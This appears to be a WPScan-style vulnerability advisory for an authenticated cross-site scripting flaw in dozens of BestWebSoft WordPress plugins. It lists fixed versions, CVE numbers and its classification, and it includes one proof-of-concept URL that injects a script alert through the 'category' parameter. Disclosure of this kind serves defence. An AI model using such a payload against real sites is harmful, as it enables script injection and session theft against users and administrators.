Multiple BestWebSoft Plugins - Authenticated Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/wp-admin/admin.php?page=bws_panel&category=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E

Affects Plugins

fixed in version 1.44
fixed in version 1.0.1
fixed in version 1.7.1
fixed in version 1.3.6
fixed in version 0.3
fixed in version 1.0.5
fixed in version 1.0.5
fixed in version 1.0.5
fixed in version 1.1.0
fixed in version 0.1.9
fixed in version 4.3.0
fixed in version 1.0.5
fixed in version 1.2.1
fixed in version 4.0.6
fixed in version 1.5.7
fixed in version 0.1.2
fixed in version 1.3.2
fixed in version 1.36
fixed in version 2.1.1
fixed in version 1.1.2
fixed in version 1.0.6
fixed in version 2.54
fixed in version 1.0.9
fixed in version 4.5.0
fixed in version 1.28
fixed in version 1.3.4
fixed in version 1.5.3
fixed in version 3.0.8
fixed in version 1.7.6
fixed in version 1.1.4
fixed in version 1.1.8
fixed in version 1.2.3
fixed in version 1.0.7
fixed in version 1.9.4
fixed in version 2.40
fixed in version 1.3.1
fixed in version 1.0.7
fixed in version 1.1.1
fixed in version 1.32
fixed in version 0.2
fixed in version 1.0.9
fixed in version 1.1.0
fixed in version 1.2.0
fixed in version 1.2.1
fixed in version 1.1.1
fixed in version 0.2
fixed in version 1.3.5
fixed in version 0.1.5
fixed in version 2.55
fixed in version 1.35
fixed in version 1.5.6
fixed in version 1.0.0
fixed in version 1.0.5

References

CVE 2017-18590
CVE 2017-18490
CVE 2017-18491
CVE 2017-18492
CVE 2017-18493
CVE 2017-18494
CVE 2017-18496
CVE 2017-18500
CVE 2017-18501
CVE 2017-18502
CVE 2017-18505
CVE 2017-18517
CVE 2017-18518
CVE 2017-18527
CVE 2017-18528
CVE 2017-18529
CVE 2017-18530
CVE 2017-18532
CVE 2017-18537
CVE 2017-18542
CVE 2017-18557
CVE 2017-18566
CVE 2017-18564
CVE 2017-18562
CVE 2017-18516
CVE 2017-18487
CVE 2017-18556
CVE 2017-18558
CVE 2017-18565
URL http://www.defensecode.com/advisories/DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf
URL http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2017-April/010860.html

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 7746
Verified Yes
WPVDB ID 8796

Timeline

Publicly Published 2017-04-12 (over 2 years ago)
Added 2017-04-13 (over 2 years ago)
Last Updated 2019-08-27 (25 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin